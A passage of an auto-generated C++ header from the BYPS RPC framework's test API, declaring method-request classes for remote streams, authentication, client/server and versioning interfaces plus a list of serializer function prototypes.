// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_getSharedStream
// typeId=1652400477
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_getSharedStream : public BMethodRequest {
public: int64_t id;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_getSharedStream();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteStreams_getSharedStream(int64_t id);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_getStreamDeferedProperies
// typeId=1205766796
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_getStreamDeferedProperies : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_getStreamDeferedProperies();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_getStreamDoNotClone
// typeId=692369677
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_getStreamDoNotClone : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_getStreamDoNotClone();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_getTextStream
// typeId=818823403
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_getTextStream : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_getTextStream();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_getVideoCheckSupportByteRange
// typeId=1006919505
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_getVideoCheckSupportByteRange : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_getVideoCheckSupportByteRange();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_putSharedStream
// typeId=468339492
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_putSharedStream : public BMethodRequest {
public: int64_t id;
public: PContentStream stream;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_putSharedStream();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteStreams_putSharedStream(int64_t id, const PContentStream& stream);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_setImage
// typeId=622789839
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_setImage : public BMethodRequest {
public: PContentStream istrm;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_setImage();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteStreams_setImage(const PContentStream& istrm);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_setImages
// typeId=2126615710
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_setImages : public BMethodRequest {
public: byps::PMapIntegerInputStream istrms;
public: int32_t doNotReadStreamAtKey;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_setImages();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteStreams_setImages(const byps::PMapIntegerInputStream& istrms, int32_t doNotReadStreamAtKey);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_setStreamDoNotMaterialize
// typeId=199832593
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_setStreamDoNotMaterialize : public BMethodRequest {
public: PContentStream stream;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_setStreamDoNotMaterialize();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteStreams_setStreamDoNotMaterialize(const PContentStream& stream);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteStreams_throwLastException
// typeId=2127402965
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteStreams_throwLastException : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteStreams_throwLastException();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteWithAuthentication_doit
// typeId=1251509013
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteWithAuthentication_doit : public BMethodRequest {
public: byps::test::api::auth::PSessionInfo sess;
public: int32_t value;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteWithAuthentication_doit();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteWithAuthentication_doit(int32_t value);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
// checkpoint byps.gen.cpp.GenApiClass:859
public: virtual void setSession(const PSerializable& __byps__sess);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteWithAuthentication_expire
// typeId=72176172
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteWithAuthentication_expire : public BMethodRequest {
public: byps::test::api::auth::PSessionInfo sess;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteWithAuthentication_expire();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
// checkpoint byps.gen.cpp.GenApiClass:859
public: virtual void setSession(const PSerializable& __byps__sess);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteWithAuthentication_login
// typeId=134687724
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteWithAuthentication_login : public BMethodRequest {
public: byps::test::api::auth::PSessionInfo sess;
public: ::std::wstring userName;
public: ::std::wstring userPwd;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteWithAuthentication_login();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteWithAuthentication_login(const ::std::wstring& userName, const ::std::wstring& userPwd);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
// checkpoint byps.gen.cpp.GenApiClass:859
public: virtual void setSession(const PSerializable& __byps__sess);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteWithAuthentication_setReloginCount
// typeId=802968058
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteWithAuthentication_setReloginCount : public BMethodRequest {
public: int32_t count;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteWithAuthentication_setReloginCount();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteWithAuthentication_setReloginCount(int32_t count);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_RemoteWithAuthentication_setUseAuthentication
// typeId=946544530
namespace byps { namespace test { namespace api { namespace remote {
using namespace ::byps;
class BRequest_RemoteWithAuthentication_setUseAuthentication : public BMethodRequest {
public: bool useAuth;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_RemoteWithAuthentication_setUseAuthentication();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_RemoteWithAuthentication_setUseAuthentication(bool useAuth);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ClientIF_getStreams
// typeId=1654980071
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ClientIF_getStreams : public BMethodRequest {
public: int32_t ctrl;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ClientIF_getStreams();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ClientIF_getStreams(int32_t ctrl);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ClientIF_incrementInt
// typeId=1685952420
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ClientIF_incrementInt : public BMethodRequest {
public: int32_t a;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ClientIF_incrementInt();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ClientIF_incrementInt(int32_t a);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ClientIF_putStreams
// typeId=2016865344
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ClientIF_putStreams : public BMethodRequest {
public: byps::PVectorInputStream strm;
public: int32_t ctrl;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ClientIF_putStreams();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ClientIF_putStreams(const byps::PVectorInputStream& strm, int32_t ctrl);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ClientIF_sendChat
// typeId=41050276
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ClientIF_sendChat : public BMethodRequest {
public: PChatStructure cs;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ClientIF_sendChat();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ClientIF_sendChat(const PChatStructure& cs);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ServerIF_callClientIncrementInt
// typeId=389860173
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ServerIF_callClientIncrementInt : public BMethodRequest {
public: int32_t v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ServerIF_callClientIncrementInt();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ServerIF_callClientIncrementInt(int32_t v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ServerIF_callClientParallel
// typeId=772308436
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ServerIF_callClientParallel : public BMethodRequest {
public: int32_t v;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ServerIF_callClientParallel();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ServerIF_callClientParallel(int32_t v);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ServerIF_getClient
// typeId=190669475
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ServerIF_getClient : public BMethodRequest {
public: int32_t id;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ServerIF_getClient();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ServerIF_getClient(int32_t id);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ServerIF_getClientIds
// typeId=2007476251
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ServerIF_getClientIds : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ServerIF_getClientIds();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ServerIF_getPartner
// typeId=1025664374
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ServerIF_getPartner : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ServerIF_getPartner();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ServerIF_getStreamsFromClient
// typeId=1679867754
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ServerIF_getStreamsFromClient : public BMethodRequest {
public: bool materializeOnServer;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ServerIF_getStreamsFromClient();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ServerIF_getStreamsFromClient(bool materializeOnServer);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ServerIF_putStreamsOnClient
// typeId=1934886286
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ServerIF_putStreamsOnClient : public BMethodRequest {
public: byps::PVectorInputStream streams;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ServerIF_putStreamsOnClient();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ServerIF_putStreamsOnClient(const byps::PVectorInputStream& streams);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ServerIF_registerWithClientMap
// typeId=1533268444
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ServerIF_registerWithClientMap : public BMethodRequest {
public: int32_t id;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ServerIF_registerWithClientMap();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ServerIF_registerWithClientMap(int32_t id);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_ServerIF_setPartner
// typeId=1332497686
namespace byps { namespace test { namespace api { namespace srvr {
using namespace ::byps;
class BRequest_ServerIF_setPartner : public BMethodRequest {
public: PClientIF client;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_ServerIF_setPartner();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_ServerIF_setPartner(const PClientIF& client);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_EvolveIF_getClient
// typeId=1212621223
namespace byps { namespace test { namespace api { namespace ver {
using namespace ::byps;
class BRequest_EvolveIF_getClient : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_EvolveIF_getClient();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_EvolveIF_getEvolve
// typeId=1279300441
namespace byps { namespace test { namespace api { namespace ver {
using namespace ::byps;
class BRequest_EvolveIF_getEvolve : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_EvolveIF_getEvolve();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_EvolveIF_sendEvolveToClient
// typeId=714115141
namespace byps { namespace test { namespace api { namespace ver {
using namespace ::byps;
class BRequest_EvolveIF_sendEvolveToClient : public BMethodRequest {
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_EvolveIF_sendEvolveToClient();
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_EvolveIF_setClient
// typeId=998004147
namespace byps { namespace test { namespace api { namespace ver {
using namespace ::byps;
class BRequest_EvolveIF_setClient : public BMethodRequest {
public: PEvolveIF partner;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_EvolveIF_setClient();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_EvolveIF_setClient(const PEvolveIF& partner);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BRequest_EvolveIF_setEvolve
// typeId=1064683365
namespace byps { namespace test { namespace api { namespace ver {
using namespace ::byps;
class BRequest_EvolveIF_setEvolve : public BMethodRequest {
public: PEvolve obj;
// checkpoint byps.gen.cpp.GenApiClass:504
public: BRequest_EvolveIF_setEvolve();
// checkpoint byps.gen.cpp.GenApiClass:551
public: BRequest_EvolveIF_setEvolve(const PEvolve& obj);
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
public: virtual void execute(const PRemote& __byps__remote, PAsyncResult __byps__asyncResult);
};
}}}}
namespace byps { namespace test { namespace api {
// Serializer for boolean[]
void BSerializer_2058423690(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for boolean[][][][]
void BSerializer_945713488(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1
void BSerializer_432867947(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_10
void BSerializer_534004421(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1000
void BSerializer_2077138821(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_100361105
void BSerializer_498939805(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1050216688
void BSerializer_70523627(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1059148284
void BSerializer_698727944(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1097129250
void BSerializer_200721390(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1097919350
void BSerializer_428832038(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1174971318
void BSerializer_1068483136(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_12
void BSerializer_534004419(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1201775504
void BSerializer_1521577218(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1218831438
void BSerializer_911793767(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_124584219
void BSerializer_996163680(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1279823631
void BSerializer_629604454(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1320560671
void BSerializer_2041057155(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1347703734
void BSerializer_881037921(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1358523233
void BSerializer_1693860029(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1359468275
void BSerializer_1738389572(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1361632968
void BSerializer_1548641599(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1365696060
void BSerializer_809340660(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1366799209
void BSerializer_1725564610(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1374008726
void BSerializer_1484626910(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1375035164
void BSerializer_1920161159(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1391985860
void BSerializer_1722268526(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_14
void BSerializer_534004417(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1406124761
void BSerializer_2127200796(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1406664368
void BSerializer_1980364794(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1457164460
void BSerializer_1111888832(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1487265161
void BSerializer_149769063(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1488550492
void BSerializer_822552572(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1493282670
void BSerializer_1955210948(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_15
void BSerializer_534004416(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1504867122
void BSerializer_1210513700(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1516687588
void BSerializer_2043070523(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1555345627
void BSerializer_343940505(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1596367810
void BSerializer_1073221568(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_16
void BSerializer_534004415(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1617670280
void BSerializer_1330811042(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1628501332
void BSerializer_368905437(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1633500852
void BSerializer_1231328865(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1633750383
void BSerializer_1293200061(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1661807911
void BSerializer_475882038(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_17
void BSerializer_534004414(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1710660846
void BSerializer_1899847531(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_171948703
void BSerializer_871356108(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1746702954
void BSerializer_408452669(BIO& bio, POBJECT& pObj, PSerializable& pObjS, void* pBase);
// Serializer for byps.test.api.BResult_1752158699
